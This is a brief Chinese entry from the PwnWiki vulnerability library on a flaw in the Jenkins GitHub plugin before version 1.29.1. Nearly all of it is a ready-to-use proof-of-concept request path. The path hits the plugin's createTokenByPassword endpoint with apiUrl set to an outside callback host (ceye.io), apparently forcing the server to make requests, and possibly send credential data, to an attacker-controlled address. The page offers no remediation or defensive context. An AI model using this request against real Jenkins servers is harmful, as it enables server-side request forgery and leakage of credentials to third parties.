PWNWIK.COM
,
影响版本
Jenkins GitHub插件小于1.29.1
利用的POC如下,其中user1为用户名。
/securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://xxx.ceye.io
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
